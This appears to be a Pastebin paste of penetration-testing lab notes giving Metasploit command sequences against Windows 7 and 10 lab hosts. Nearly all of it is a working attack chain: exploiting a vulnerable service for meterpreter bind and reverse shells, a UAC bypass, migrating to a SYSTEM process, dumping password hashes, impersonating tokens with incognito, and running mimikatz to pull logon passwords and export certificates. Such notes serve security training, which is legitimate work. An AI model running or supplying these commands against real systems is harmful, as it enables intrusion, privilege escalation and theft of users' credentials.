Advertisement
joemccray

1

Sep 18th, 2019
611
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.17 KB | None | 0 0
  1. Windows 10
  2. ----------
  3. use exploit/windows/misc/vulnserv
  4. set PAYLOAD windows/meterpreter/bind_tcp
  5. set RHOST 192.168.195.143
  6. set RPORT 9999
  7. exploit
  8.  
  9.  
  10.  
  11. Windows 7
  12. ---------
  13. use exploit/windows/misc/vulnserv
  14. set PAYLOAD windows/meterpreter/bind_tcp
  15. set RHOST 192.168.195.141
  16. set RPORT 9999
  17. exploit
  18. background
  19.  
  20.  
  21.  
  22. use exploit/windows/local/ask
  23. set SESSION 8
  24. set PAYLOAD windows/meterpreter/reverse_tcp
  25. set LHOST 192.168.195.143
  26. set LPORT 7799
  27. exploit
  28.  
  29.  
  30.  
  31. -----------------------------------------------------------------------
  32.  
  33.  
  34. A window will pop up and you need to click Yes in order to get your new meterpreter shell
  35.  
  36.  
  37. meterpreter > getuid
  38.  
  39. meterpreter > ps (search for a process running as NT AUTHORITY\SYSTEM)
  40.  
  41. meterpreter > migrate 2800 (your process id WILL NOT be 2800, but make sure you use one that is running at NT AUTHORITY\SYSTEM)
  42.  
  43. meterpreter > getsystem
  44. ...got system (via technique 1).
  45.  
  46.  
  47. meterpreter > getuid
  48. Server username: NT AUTHORITY\SYSTEM
  49.  
  50.  
  51. meterpreter> run post/windows/gather/hashdump
  52.  
  53. meterpreter> run post/windows/gather/credentials/credential_collector
  54. -----------------------------------------------------------------------
  55.  
  56.  
  57. ********************************** Steal Tokens **********************************
  58.  
  59. ---------------------------Type This-----------------------------------
  60. meterpreter > getsystem
  61.  
  62. meterpreter > use incognito
  63.  
  64. meterpreter > list_tokens -u
  65.  
  66. meterpreter > list_tokens -g
  67.  
  68. meterpreter > impersonate_token <-- choose who you want to impersonate but be sure to use 2 slashes in the name (ex: impersonate_token domain\\user)
  69.  
  70. meterpreter> getuid
  71. -----------------------------------------------------------------------
  72.  
  73.  
  74. ************ Stealing credentials and certificates ************
  75. - NOTE: Most of the stuff after 'kerberos' DOES NOT work, but is given here so you know the correct syntax to use when connected to AD or dealing with smart/CAC cards.
  76.  
  77. ---------------------------Type This-----------------------------------
  78. meterpreter > getsystem
  79.  
  80. meterpreter > load mimikatz
  81.  
  82. meterpreter > kerberos
  83.  
  84. meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"
  85.  
  86. meterpreter > msv <-- Your AD password
  87.  
  88. meterpreter > livessp <-- Your Windows8 password
  89.  
  90. meterpreter > ssp <-- Your outlook password
  91.  
  92. meterpreter > tspkg <-- Your AD password
  93.  
  94. meterpreter > wdigest <-- Your AD password
  95.  
  96. meterpreter > mimikatz_command -f crypto::listStores
  97.  
  98. meterpreter > mimikatz_command -f crypto::listCertificates
  99.  
  100. meterpreter > mimikatz_command -f crypto::exportCertificates CERT_SYSTEM_STORE_CURRENT_USER
  101.  
  102. meterpreter > mimikatz_command -f crypto::patchcapi
  103.  
  104. meterpreter> search -d <directory> -f <file-pattern>
  105. -----------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement